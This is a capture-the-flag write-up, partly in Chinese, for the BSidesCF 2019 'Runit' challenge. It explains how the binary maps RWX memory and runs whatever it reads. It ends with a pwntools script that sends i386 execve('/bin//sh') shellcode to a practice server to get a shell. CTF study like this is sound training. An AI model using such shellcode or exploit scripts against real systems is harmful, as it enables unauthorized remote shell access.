[BSidesCF 2019]Runit
Arch: i386-32-little
RELRO: Partial RELRO
Stack: No canary found
NX: NX enabled
PIE: No PIE (0x8048000)
32 位程序，只开启了 NX（没有 canary，没有 PIE，Partial RELRO）。
/*
 * main() of the challenge binary, in what appears to be decompiler output
 * (note the __cdecl keyword and the stack-slot annotation on buf).
 *
 * It maps one 0x400-byte region, reads up to 0x400 bytes from fd 0 into it
 * and then calls the region as a function.
 *
 * Returns 0 once that call returns; exits with status 1 if read() fails.
 */
int __cdecl main(int argc, const char **argv, const char **envp)
{
void *buf; // [esp+8h] [ebp-10h]
// On Linux, prot 7 is PROT_READ|PROT_WRITE|PROT_EXEC and flags 34 (0x22) is
// MAP_PRIVATE|MAP_ANONYMOUS: the region is writable and executable at the
// same time, so the NX setting reported by checksec does not protect it.
// The result is never compared with MAP_FAILED.
buf = mmap(0, 0x400u, 7, 34, 0, 0);
// Schedules SIGALRM 10 seconds from now; no handler is installed here.
alarm(0xAu);
// Mode 2 is _IONBF in glibc, i.e. unbuffered output.
setvbuf(stdout, 0, 2, 0);
// _bss_start is the decompiler's label for this object; presumably another
// stdio stream -- confirm in the binary.
setvbuf(_bss_start, 0, 2, 0);
puts("Send me stuff!!");
// Only a negative return counts as an error; an empty or short read still
// reaches the call below.
if ( read(0, buf, 0x400u) < 0 )
{
puts("Error reading!");
exit(1);
}
// Control transfers to the bytes just read from fd 0. Nothing between the
// read() and this call inspects or restricts that input.
((void (*)(void))buf)();
return 0;
}
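mmap 为 buf 申请了一段权限为 7（可读、可写、可执行，即 RWX）的内存。
程序把最多 0x400 字节的输入读入 buf 之后，直接把 buf 当作函数来调用；由于这段映射本身可执行，checksec 中开启的 NX 对它不起保护作用。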
(又水一题x
from pwn import*
from Yapack import *
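# The target is a 32-bit x86 ELF (checksec reports i386-32-little), so the
# pwntools context names i386 rather than amd64. The payload below is raw
# bytes, so this setting only matters to helpers that consult the context.
context(os='linux', arch='i386', log_level='debug')
# rec(), sl() and ia() come from the author's Yapack helper module, which is
# not shown on this page; presumably they open the connection, send one line
# and switch to interactive mode -- confirm against Yapack.
r, elf = rec("node4.buuoj.cn", 26129, "./pwn", 10)
# 21 bytes of i386 machine code that issue execve("/bin//sh", NULL, NULL)
# through int 0x80. main() calls the buffer it has just read, so these bytes
# run without any further step.
sl(b'\x6a\x0b\x58\x99\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\xcd\x80')
ia()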